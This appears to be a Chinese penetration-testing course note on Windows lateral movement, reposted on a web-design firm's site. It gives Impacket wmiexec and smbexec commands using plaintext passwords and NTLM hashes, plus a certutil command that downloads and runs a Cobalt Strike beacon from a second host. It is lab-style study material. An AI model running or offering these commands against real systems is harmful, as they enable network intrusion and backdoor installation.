尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

第179-180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件

第179-180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件
📅 发布时间:2026/6/20 9:56:56

学习的目的

windows 2012以上默认关闭了Wdigest,所以攻击者无法通过内存获取到明文密码
为了针对以上情况 所以有四种方法解决:
1.利用(PTH,PTK)等进行移动不需要明文
2.利用其他服务协议(SMB/WMI等进行哈希移动)
3.利用注册表开启(wdigest auth)进行获取、
4.利用工具或者第三方平台(HASHCAT进行破解获取)
image

WMI

WMI全称"windows管理规范",从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
利用条件:
1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。

wmi横向移动的使用:wmiexec-impacket (主要使用方法)

python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "whoami"
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32 "whoami"
下载后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
执行后门:
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "c:/beacon.exe"

通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
image

SMB服务

SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。利用SMB可通过明文或HASH传递来远程执行。
利用条件:
1、文件与打印机服务开启,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码或HASH。

利用方法
法一,smbexec-impacket

外部:(交互式)
python smbexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32

法二4.CS插件:
cs-psexec
SMB横向移动:
推荐使用impacket和CS插件
image

image

IIS服务器的目录 c:\inetpub\wwwroot
image

通过wmic 进行后门上线,这边的主机名和用户名是通过前期的信息收集收集而来的
image

有可以直接进行交互式的工具以及CS的插件cscript(不建议使用)

SMB横向移动:
推荐使用impacket和CS插件
image

image

dcom是通过powershell进行利用的,只有windows7(windows server8)以后的版本才有powershell,并且需要关闭防火墙,比较鸡肋。

实战当中,要去分析防火墙限制了什么协议,然后再来选择通过上面方式进行横向移动
像SMB这种就需要开放文件和打印机共享,怎么判断限制了什么协议,就可以直接使用impacket里面的代码进行攻击,成功的话就是可以

电脑是默认打开文件和打印机共享的,所以正常是可以使用SMB进行横向移动的
image

主要注意几个点:
(1)使用命令攻击时计算机名需要写入,分清域内用户和域外用户
(2)wmi,smb,dcom三个横向手法所需要的条件,并且要学会什么时候使用什么协议进行攻击,也就是用impacket进行探测,探测成功后进行使用
(3)掌握明文和非明文(hash)的攻击方法
(4)掌握计算机名的信息收集,主要是通过spn收集,systeminfo,net view /domain

相关新闻

  • Newton迭代法-----牛顿迭代法求解高次方函数的近似根
  • 2025 年 11 月 CBN 砂轮厂家最新推荐:磨粒精筛 + 工艺焕新,高稳定产品选购指南
  • 设备调试基础实验

最新新闻

  • 2026 年 6 月最新腕表干货!万国全大陆官方正规维修门店地址完整公示,全国统一售后热线同步全新上线 - 万国中国服务中心
  • 天津名包回收机构实地测评:5家店报价服务全方位对比,看完再卖! - 讯息早知道
  • 2026年6月最新劳力士中国官方售后热线服务电话客户地址网点 - 劳力士服务中心
  • 2026年大平层装修深度测评:如何为你的改善型住宅匹配最佳方案? - 速递信息
  • ARM Cortex-M4微控制器架构解析:从内核到低功耗设计实战
  • 肇庆黄金回收实测六家靠谱老店盘点 - 余生黄金回收

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号